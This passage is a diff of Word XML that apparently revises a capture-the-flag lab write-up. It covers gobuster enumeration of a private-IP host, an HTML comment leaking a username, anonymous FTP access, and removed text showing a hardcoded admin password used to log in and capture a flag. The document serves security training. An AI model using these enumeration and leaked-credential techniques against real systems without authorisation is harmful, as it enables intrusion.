+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>Checked robots.txt and performed directory enumeration using gobuster.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11FD3979" wp14:editId="419BEB84">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="621E35B5" wp14:editId="017CD1AE">
             <wp:extent cx="5731510" cy="2820670"/>
             <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="273147294" name="Picture 33"/>
+            <wp:docPr id="1638671097" name="Picture 33"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -5653,7 +4920,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="273147294" name="Picture 273147294"/>
+                    <pic:cNvPr id="1638671097" name="Picture 1638671097"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -5686,41 +4953,120 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Screenshot 5 –</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>gobuster dir -u http://192.168.5.183 -w word.dir</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Discovered hidden directory:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
         </w:rPr>
-        <w:t>Extracted Backup File Showing Flag</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+        <w:t>happy</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35C24F06" wp14:editId="620053CE">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25E2AFE4" wp14:editId="28027630">
             <wp:extent cx="5731510" cy="2820670"/>
             <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="211688256" name="Picture 34"/>
+            <wp:docPr id="205036960" name="Picture 34"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -5728,7 +5074,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="211688256" name="Picture 211688256"/>
+                    <pic:cNvPr id="205036960" name="Picture 205036960"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -5759,144 +5105,120 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Phase 5 –</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Accessing /happy revealed an HTML comment:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
         </w:rPr>
-        <w:t>Source Code Inspection</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="25"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Viewed page source of the application</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Discovered HTML comment containing admin credentials:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+        <w:t>&lt;!--</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> username: shadowops &gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">This exposed a valid username: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
           <w:color w:val="EE0000"/>
         </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="EE0000"/>
-        </w:rPr>
-        <w:t>&lt;!--</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="EE0000"/>
-        </w:rPr>
-        <w:t>Admin Password remove after deploying on production:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Very_Strong_p@ssw0rd_k33p_pr1v4t3--&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>This indicates poor deployment practices.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Screenshot 6 –</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Page Source Showing Hardcoded Password</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
+        <w:t>shadowops</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D5952C4" wp14:editId="0B233DA3">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44475C92" wp14:editId="1C03BAC6">
             <wp:extent cx="5731510" cy="2820670"/>
             <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="730971033" name="Picture 35"/>
+            <wp:docPr id="1995056046" name="Picture 36"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -5904,7 +5226,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="730971033" name="Picture 730971033"/>
+                    <pic:cNvPr id="1995056046" name="Picture 1995056046"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -5937,215 +5259,207 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Phase 6 –</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Admin Login</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Accessed:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>FTP Analysis</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Connected to FTP:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
         </w:rPr>
-        <w:t>http://192.168.5.84/login.php</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Credentials used:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+        <w:t>ftp 192.168.5.183</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:color w:val="EE0000"/>
         </w:rPr>
-        <w:t>Username:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t>Anonymous access was allowed.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Discovered a file named:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
         </w:rPr>
-        <w:t>admin</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="EE0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Password: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
         </w:rPr>
-        <w:t>Very_Strong_p@ssw0rd_k33p_pr1v4t3</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Login successful.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Admin panel revealed final flag.</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Final Flag</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>ThunderCipher{</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Admin_access_granted_with_leaked_password}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Screenshot 7 –</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Admin Login Page</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
+        <w:t>word.dir</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>Downloaded the wordlist for further enumeration.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38564C6D" wp14:editId="23F8640E">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="559BD2E5" wp14:editId="6EADC8F8">
             <wp:extent cx="5731510" cy="2820670"/>
             <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="1459216330" name="Picture 36"/>
+            <wp:docPr id="1132785747" name="Picture 37"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -6153,7 +5467,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1459216330" name="Picture 1459216330"/>
+                    <pic:cNvPr id="1132785747" name="Picture 1132785747"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -6184,53 +5498,253 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
